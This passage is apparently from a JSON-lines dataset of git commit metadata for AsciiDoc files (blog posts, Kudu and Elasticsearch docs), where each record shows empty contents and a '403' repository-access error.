urtStam\/kurtstam.github.io,itsashis4u\/hubpress.io,CBSti\/CBSti.github.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0110d28cd97143f467c36fb9cb8f69f3c651d2ab","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8249d173e58512437ce583186cc74d48fef8e9d","subject":"Update 2011-01-05-Apache-and-Request-Body-Timeout.adoc","message":"Update 2011-01-05-Apache-and-Request-Body-Timeout.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-05-Apache-and-Request-Body-Timeout.adoc","new_file":"_posts\/2011-01-05-Apache-and-Request-Body-Timeout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de43ffe778d47e458037cf7ed950899fdb65ab83","subject":"[docs] guide on assertions in the Java code","message":"[docs] guide on assertions in the Java code\n\nAdded guide on using assert and Guava Preconditions in the Kudu Java\nclient code. That's a compilation of the information from the following\ne-mail thread:\n\n https:\/\/lists.apache.org\/thread.html\/13e39d1c4e632c5fcc134097a045fe89f5a2955ac3838a48e4e38bc2@%3Cdev.kudu.apache.org%3E\n\nAlso, separated the CMake style guide from the C++ code style section.\n\nChange-Id: I78c249021f9eb9a9a94cdf1ff1b2dae94561c2fd\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7549\nTested-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"571289d2286f6e3c8c47a008f2f0b289a12b87fe","subject":"docs: fix two broken links in docs","message":"docs: fix two broken links in docs\n\nChange-Id: I227af7b51d6c64b7a2151665f7a36a3aecb75e34\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1183\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dab892645b19fdedfa34388bfc7adb01afee2271","subject":"Update 2016-11-23-Project-Darwin.adoc","message":"Update 2016-11-23-Project-Darwin.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2016-11-23-Project-Darwin.adoc","new_file":"_posts\/2016-11-23-Project-Darwin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d36df2c78934f907d00c3691c868d60f53ec28","subject":"Update 2016-11-02-hej.adoc","message":"Update 2016-11-02-hej.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2016-11-02-hej.adoc","new_file":"_posts\/2016-11-02-hej.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"924690134395b8df95a2bb3fa63783686df8dc83","subject":"Add files via upload","message":"Add files via upload\n\nAsciidoc trial","repos":"smru\/Documentation,smru\/Documentation","old_file":"_template.adoc","new_file":"_template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed0be364cda18cb9e5d5cc93f74893b9e6c3fc60","subject":"Update 2017-07-25-Under-the-shades.adoc","message":"Update 2017-07-25-Under-the-shades.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-07-25-Under-the-shades.adoc","new_file":"_posts\/2017-07-25-Under-the-shades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2645345752b2514880b90858abc159229a08f57","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5b6b64f8d96b6dd8410970b29b575c7bf8b1b78","subject":"Update 2017-03-23-Update-Whats-New-in-Version-080.adoc","message":"Update 2017-03-23-Update-Whats-New-in-Version-080.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2017-03-23-Update-Whats-New-in-Version-080.adoc","new_file":"_posts\/2017-03-23-Update-Whats-New-in-Version-080.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f951288110e173a46eb2bbb215eb9ad66780b930","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-TheDIYJacketUpgradeThankMeLater.adoc","new_file":"_posts\/2018-01-07-TheDIYJacketUpgradeThankMeLater.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"129bfb310a0784ca9252f1760f84ef4eeccfce4e","subject":"Update 2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","message":"Update 2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","new_file":"_posts\/2016-03-02-Rivers-of-Light-to-debut-April-22-in-Disneys-Animal-Kingdom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57157d90628fc0bde7601fd78ae0b1b3adf0563f","subject":"Update 2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","message":"Update 2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","new_file":"_posts\/2017-07-30-aspnet-core-with-cookie-authentication-in-web-farm-scenario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efcddb217c1e77879fcc04cf31ebb3b5d27a244e","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e62a878ee541e30dc26a0b3d5d95b5773a93ce","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fc9f193df45e4421d899ceb635d7eaa91342117","subject":"Moved exporting ogre to own file.","message":"Moved exporting ogre to own file.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_ogre_export.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_ogre_export.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d4782eb18f1572eaf19bdab1a7265c6bba8aecdd","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdba76162db558b11a1962049d3b64b722003b27","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90024fbb8ae53c9a4934f01eb30ec13c7da73a28","subject":"Added initial readme for Herbert.","message":"Added initial readme for Herbert.\n","repos":"obfischer\/herbert","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obfischer\/herbert.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfccc609206c77fee049c638143947f357bd51de","subject":"y2b create post Turn Any Surface Into A Touch Screen!","message":"y2b create post Turn Any Surface Into A Touch Screen!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-02-Turn-Any-Surface-Into-A-Touch-Screen.adoc","new_file":"_posts\/2016-09-02-Turn-Any-Surface-Into-A-Touch-Screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc51ee0f3f2dbb48439bdd11264fafd3881b7d2","subject":"Update 2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","message":"Update 2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","new_file":"_posts\/2017-11-13-Log-directly-to-Logstash-from-Payara.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7335f0ccaadf442a64b73193ba3df2aac70c0a","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"294568e8356427d91d139fa1bd6f5c226a53a000","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ea60f996dd876e9648a24ff8416e2832644d29c","subject":"Update 2015-02-18-Coding-rules.adoc","message":"Update 2015-02-18-Coding-rules.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Coding-rules.adoc","new_file":"_posts\/2015-02-18-Coding-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c25b37f73a08bd0dfc78e96d9442cdb17b58fd4c","subject":"draft final report","message":"draft final report\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-25-final_report.adoc","new_file":"_posts\/2017-08-25-final_report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3afc0688a48954baa864d6e5ba8a2966625c6d8","subject":"job: #12562 Introduce implementation note for file load fix.","message":"job: #12562 Introduce implementation note for file load fix.\n","repos":"leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc","old_file":"doc\/notes\/12562_wasl_sensitive_int.adoc","new_file":"doc\/notes\/12562_wasl_sensitive_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57c752000cfe4f7020ecd98be08a7d7ab015c4f6","subject":"[DOCS] Update shared attributes for Elasticsearch (#25479)","message":"[DOCS] Update shared attributes for Elasticsearch (#25479)\n\n* [DOCS] Update shared attributes for Elasticsearch\r\n\r\n* [DOCS] Moved shared attributes to Versions.asciidoc\r\n\r\n* [DOCS] More more book URLs to shared attributes\r\n","repos":"kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,naveenhooda2000\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,shreejay\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mohit\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b5d4d1ed7e883674a32953ab20c46b978790210","subject":"y2b create post Samsung Galaxy S III Unboxing \\u0026 Overview (Galaxy S3 Pebble Blue)","message":"y2b create post Samsung Galaxy S III Unboxing \\u0026 Overview (Galaxy S3 Pebble Blue)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-08-Samsung-Galaxy-S-III-Unboxing-u0026-Overview-Galaxy-S3-Pebble-Blue.adoc","new_file":"_posts\/2012-10-08-Samsung-Galaxy-S-III-Unboxing-u0026-Overview-Galaxy-S3-Pebble-Blue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ae47fb976da1d1fd19f1c9290c1a3332599affe","subject":"y2b create post It's time to sell your iPhone","message":"y2b create post It's time to sell your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-02-Its-time-to-sell-your-iPhone.adoc","new_file":"_posts\/2013-09-02-Its-time-to-sell-your-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f43f057a7c2c36d870acb63f30260047b48a0ab6","subject":"Update 2016-06-07-Hello-World.adoc","message":"Update 2016-06-07-Hello-World.adoc","repos":"lauesa\/Blog,lauesa\/Blog,lauesa\/Blog,lauesa\/Blog","old_file":"_posts\/2016-06-07-Hello-World.adoc","new_file":"_posts\/2016-06-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lauesa\/Blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d8c3c8f53a404f5ca85f844e863632ae11adb60","subject":"Update 2016-07-15-Git-command.adoc","message":"Update 2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de62c7d9aa53861f32994b7ffce28e6b21f3ffa","subject":"Update 2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","message":"Update 2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","new_file":"_posts\/2015-12-27-All-In-One-Installer-Android-Cordova-Ionic-Framework-di-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5a358c499ab5bc8468aebb7604b1e0cc6d841ab","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"660fa8fcaa5643b44f06a9f9d994e2ce57b60164","subject":"Update 2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","message":"Update 